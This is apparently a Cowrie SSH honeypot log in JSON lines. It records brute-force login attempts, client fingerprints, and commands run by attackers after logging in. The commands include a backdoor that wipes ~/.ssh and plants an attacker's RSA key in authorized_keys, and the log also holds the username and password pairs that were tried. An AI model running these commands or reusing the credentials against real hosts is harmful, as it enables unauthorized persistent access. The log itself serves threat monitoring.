{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:22.141837Z","src_ip":"87.120.191.13","session":"e0fdad4f3a2f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:22.142554Z","src_ip":"87.120.191.13","session":"e0fdad4f3a2f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qa2ws3ed","message":"login attempt [admin/1qa2ws3ed] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:22.368965Z","src_ip":"87.120.191.13","session":"e0fdad4f3a2f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:23.473552Z","src_ip":"87.120.191.13","session":"e0fdad4f3a2f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":47090,"dst_ip":"1.2.3.4","dst_port":22,"session":"af9747feb33b","protocol":"ssh","message":"New connection: 87.120.191.13:47090 (1.2.3.4:22) [session: af9747feb33b]","sensor":"my-vps","timestamp":"2025-08-26T01:54:23.500137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:54:23.569900Z","src_ip":"87.120.191.13","session":"af9747feb33b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:54:23.571879Z","src_ip":"87.120.191.13","session":"af9747feb33b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"panasonic","message":"login attempt [admin/panasonic] failed","sensor":"my-vps","timestamp":"2025-08-26T01:54:23.934296Z","src_ip":"87.120.191.13","session":"af9747feb33b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:54:24.996231Z","src_ip":"87.120.191.13","session":"af9747feb33b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":47094,"dst_ip":"1.2.3.4","dst_port":22,"session":"e344b0c176cd","protocol":"ssh","message":"New connection: 87.120.191.13:47094 (1.2.3.4:22) [session: e344b0c176cd]","sensor":"my-vps","timestamp":"2025-08-26T01:54:25.019617Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:55:47.385792Z","src_ip":"87.120.191.13","session":"974c347ca4dc"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:55:47.582937Z","src_ip":"87.120.191.13","session":"814dd5b8acca"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:55:47.619128Z","src_ip":"87.120.191.13","session":"6d2a89faca2a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:55:47.632043Z","src_ip":"87.120.191.13","session":"5c357538baa4"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:55:47.765406Z","src_ip":"87.120.191.13","session":"37cc6b7acc65"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:06.018641Z","src_ip":"87.120.191.13","session":"d8d040af09a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45464,"dst_ip":"1.2.3.4","dst_port":22,"session":"2838da8330d5","protocol":"ssh","message":"New connection: 212.227.125.160:45464 (1.2.3.4:22) [session: 2838da8330d5]","sensor":"my-vps","timestamp":"2025-08-26T01:56:08.382336Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003Z\\x93b\\xce\u0016\u000f\\x85jxp\\xff\u0018Q:\\x8eAp\\xc7\\xeeI\\xd3\\xebF","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003Z\\x93b\\xce\u0016\u000f\\x85jxp\\xff\u0018Q:\\x8eAp\\xc7\\xeeI\\xd3\\xebF","sensor":"my-vps","timestamp":"2025-08-26T01:56:08.383203Z","src_ip":"212.227.125.160","session":"2838da8330d5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:08.384251Z","src_ip":"212.227.125.160","session":"2838da8330d5"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:25.023116Z","src_ip":"87.120.191.13","session":"e344b0c176cd"}
{"eventid":"cowrie.session.connect","src_ip":"85.185.45.52","src_port":6124,"dst_ip":"1.2.3.4","dst_port":22,"session":"25bbc2c2a647","protocol":"ssh","message":"New connection: 85.185.45.52:6124 (1.2.3.4:22) [session: 25bbc2c2a647]","sensor":"my-vps","timestamp":"2025-08-26T01:56:30.990589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:30.991366Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:31.083762Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.login.success","username":"root","password":"q1w2e3R4","message":"login attempt [root/q1w2e3R4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:31.492533Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:31.701360Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:56:31.702268Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:56:31.703628Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:31.797541Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:32.076226Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.076913Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.170569Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.171440Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.session.connect","src_ip":"85.185.45.52","src_port":58794,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac8ce8f62e10","protocol":"ssh","message":"New connection: 85.185.45.52:58794 (1.2.3.4:22) [session: ac8ce8f62e10]","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.260261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.260937Z","src_ip":"85.185.45.52","session":"ac8ce8f62e10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.351985Z","src_ip":"85.185.45.52","session":"ac8ce8f62e10"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:56:32.757800Z","src_ip":"85.185.45.52","session":"ac8ce8f62e10"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:33.851186Z","src_ip":"85.185.45.52","session":"ac8ce8f62e10"}
{"eventid":"cowrie.session.connect","src_ip":"85.185.45.52","src_port":63834,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7cb19a38d6b","protocol":"ssh","message":"New connection: 85.185.45.52:63834 (1.2.3.4:22) [session: a7cb19a38d6b]","sensor":"my-vps","timestamp":"2025-08-26T01:56:33.941529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:33.942421Z","src_ip":"85.185.45.52","session":"a7cb19a38d6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:34.032473Z","src_ip":"85.185.45.52","session":"a7cb19a38d6b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:34.435344Z","src_ip":"85.185.45.52","session":"a7cb19a38d6b"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:34.526949Z","src_ip":"85.185.45.52","session":"25bbc2c2a647"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:34.528010Z","src_ip":"85.185.45.52","session":"a7cb19a38d6b"}
{"eventid":"cowrie.session.connect","src_ip":"134.122.191.244","src_port":42192,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6895524d215","protocol":"ssh","message":"New connection: 134.122.191.244:42192 (1.2.3.4:22) [session: b6895524d215]","sensor":"my-vps","timestamp":"2025-08-26T01:56:44.606308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:44.607230Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:45.550947Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.login.success","username":"root","password":"administrator@1","message":"login attempt [root/administrator@1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:46.157265Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:46.626429Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:56:46.627230Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:56:46.627980Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:46.829905Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.session.connect","src_ip":"186.96.151.198","src_port":58764,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bb550fe1940","protocol":"ssh","message":"New connection: 186.96.151.198:58764 (1.2.3.4:22) [session: 1bb550fe1940]","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.152804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.153564Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.306406Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:48.504711Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 